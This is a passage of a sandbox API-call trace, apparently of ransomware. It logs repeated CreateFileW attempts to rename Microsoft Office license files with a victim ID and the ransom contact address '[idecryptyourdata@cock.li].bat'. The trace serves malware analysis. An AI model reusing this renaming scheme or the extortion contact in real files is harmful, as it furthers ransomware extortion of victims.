office\\root\\licenses16\\mondovl_mak-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.619] CloseHandle (hObject=0x514) returned 1 [0163.620] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.620] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_MAK-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_mak-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.620] CloseHandle (hObject=0x514) returned 1 [0163.621] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.621] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.621] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_MAK-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_mak-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.621] CloseHandle (hObject=0x514) returned 1 [0163.622] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.622] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.622] CloseHandle (hObject=0x514) returned 1 [0163.623] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.623] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.623] CloseHandle (hObject=0x514) returned 1 [0163.624] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.624] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.624] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Subscription-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subscription-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.624] CloseHandle (hObject=0x514) returned 1 [0163.625] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.625] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Subscription-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subscription-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.625] CloseHandle (hObject=0x514) returned 1 [0163.626] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.626] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_Subscription-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subscription-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.627] CloseHandle (hObject=0x514) returned 1 [0163.627] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.627] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTest-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtest-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.628] CloseHandle (hObject=0x514) returned 1 [0163.628] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.628] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.629] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTest-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtest-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.629] CloseHandle (hObject=0x514) returned 1 [0163.629] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.630] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTest-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtest-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.630] CloseHandle (hObject=0x514) returned 1 [0163.634] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.634] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTrial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtrial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.634] CloseHandle (hObject=0x514) returned 1 [0163.635] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.635] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTrial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtrial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.635] CloseHandle (hObject=0x514) returned 1 [0163.636] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.636] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365BusinessR_SubTrial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365businessr_subtrial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.636] CloseHandle (hObject=0x514) returned 1 [0163.637] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.637] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremDemoR_BypassTrial180-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremdemor_bypasstrial180-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.637] CloseHandle (hObject=0x514) returned 1 [0163.638] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.638] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.638] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremDemoR_BypassTrial180-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremdemor_bypasstrial180-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.638] CloseHandle (hObject=0x514) returned 1 [0163.639] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.639] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremDemoR_BypassTrial180-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremdemor_bypasstrial180-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.639] CloseHandle (hObject=0x514) returned 1 [0163.640] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.640] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.641] CloseHandle (hObject=0x514) returned 1 [0163.641] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.641] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.642] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.642] CloseHandle (hObject=0x514) returned 1 [0163.642] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.643] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription1-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription1-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.643] CloseHandle (hObject=0x514) returned 1 [0163.644] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.644] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription1-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription1-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.644] CloseHandle (hObject=0x514) returned 1 [0163.645] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.645] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription1-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription1-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.645] CloseHandle (hObject=0x514) returned 1 [0163.646] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.646] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.646] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.646] CloseHandle (hObject=0x514) returned 1 [0163.647] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.647] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.647] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.647] CloseHandle (hObject=0x514) returned 1 [0163.648] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.648] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.648] CloseHandle (hObject=0x514) returned 1 [0163.649] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.649] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription3-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription3-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.649] CloseHandle (hObject=0x514) returned 1 [0163.650] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.650] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription3-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription3-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.651] CloseHandle (hObject=0x514) returned 1 [0163.651] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.651] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.651] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription3-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription3-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.652] CloseHandle (hObject=0x514) returned 1 [0163.652] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.652] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.652] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription4-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription4-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.653] CloseHandle (hObject=0x514) returned 1 [0163.653] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.653] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.654] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription4-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription4-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.654] CloseHandle (hObject=0x514) returned 1 [0163.655] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.655] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.655] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription4-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription4-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.655] CloseHandle (hObject=0x514) returned 1 [0163.656] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.656] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_Subscription5-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subscription5-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 